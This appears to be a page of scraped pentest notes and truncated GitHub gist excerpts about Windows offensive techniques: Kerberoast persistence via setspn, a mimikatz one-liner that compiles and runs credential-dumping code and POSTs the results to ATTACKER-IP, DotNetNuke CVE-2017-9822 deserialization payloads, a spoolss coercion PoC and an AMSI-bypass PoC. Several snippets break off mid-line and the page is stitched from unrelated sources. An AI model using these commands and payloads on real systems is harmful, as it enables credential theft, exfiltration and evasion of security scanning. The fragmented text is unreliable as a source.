Misc persistence techniques

Set User SPN for future kerberoast attacks

Set an SPN on a user account so that, if the account's password is later changed, the password can be recovered again via Kerberoasting.

Example

setspn -S MSSQLSvc/myhost.redmond.microsoft.com:1433 redmond\accountname
@dru1d-foofus
dru1d-foofus / commands.txt
Last active April 28, 2022 21:44
SubTee's mimikatz magic
Credits: https://github.com/caseysmithrc and https://github.com/xillwillx
#On attacker machine:
#nc -lkvp 80 >> katz-listener.log
#SSL encrypted traffic
#ncat -lkvp 443 --ssl
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/dru1d-foofus/aa8c6894c2be84bb01b1ddeba492134e/raw/a8e703dcb7af9ea02309c71292931670c2ec63f7/katz.cs','katz.cs'); && c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && c:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe privilege::debug sekurlsa::logonpasswords > katz.txt exit && powershell -ExecutionPolicy Bypass -noLogo -Command (Invoke-WebRequest -Uri http://ATTACKER-IP/$env:ComputerName -Method POST -InFile katz.txt -TimeoutSec 5); exit && del katz.* && exit
#SSL - encrypted traffic
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebCl
@raandree
raandree / Get-KerberosKeytab.ps1
Last active December 27, 2023 02:33
Parses Kerberos Keytab files
param(
[Parameter(Mandatory)]
[string]$Path
)
#Created by [email protected]
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
# keytab {
@3xocyte
3xocyte / dementor.py
Last active June 18, 2025 09:27
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser

Notes

Enumeration

Scan IPs to a CSV file:

cd /mnt/hgfs/Shared/Exam
mkdir hosts
ruby scan.rb tcp 10.11.1.220 10.11.1.221 10.11.1.44 10.11.1.218 10.11.1.219
ruby scan.rb udp 10.11.1.220 10.11.1.221 10.11.1.44 10.11.1.218 10.11.1.219
@7MinSec
7MinSec / SIEMple_SIEM_questionnaire_and_tests.md
Last active March 18, 2024 12:43
Some simple security tests you can run to test the effectiveness of your SIEM

Introduction

In episode 338 of the 7 Minute Security podcast, I talked about a recent engagement where I helped a customer do a bit of a SIEM solution bake-off. This gist is the companion to that episode, and is broken down into the following two sections:

  • Questionnaire - a series of questions you can ask SIEM vendors to gather as many data points about their products and services as possible

  • SIEM tests - a few tests you can conduct on your internal/external network to see if your SIEM solution indeed coughs up alerts on some things it should indeed whine about

Questionnaire

Introduction / Purpose

@pwntester
pwntester / ReadFile.xml
Created October 31, 2018 12:20
DotNetNuke (CVE-2017-9822) Payloads
<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>
@PaulSec
PaulSec / search_apkpure.py
Created November 18, 2018 12:45
APKPure.com search utility
#!/usr/bin/env python
# python search.py -s uber
# https://apkpure.com/search?q=uber
# Name: Uber, (package: com.ubercab), Download: https://apkpure.com/uber/com.ubercab
# Name: Uber Driver, (package: com.ubercab.driver), Download: https://apkpure.com/uber-driver/com.ubercab.driver
# Name: Lyft, (package: me.lyft.android), Download: https://apkpure.com/lyft/me.lyft.android
# Name: Uber Eats: Local Food Delivery, (package: com.ubercab.eats), Download: https://apkpure.com/uber-eats-local-food-delivery/com.ubercab.eats
# Name: Uber Fleet, (package: com.ubercab.fleet), Download: https://apkpure.com/uber-fleet/com.ubercab.fleet
# Name: Free Uber Coupon Code, (package: taxiuber.coupon.code), Download: https://apkpure.com/free-uber-coupon-code/taxiuber.coupon.code
@mattifestation
mattifestation / CorruptCLRGlobal.ps1
Created December 7, 2018 12:45
A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
function Subvert-CLRAntiMalware {
<#
.SYNOPSIS
A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.
.DESCRIPTION
clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the first DWORD, the context structure becomes corrupted and subsequent scanning calls fail open.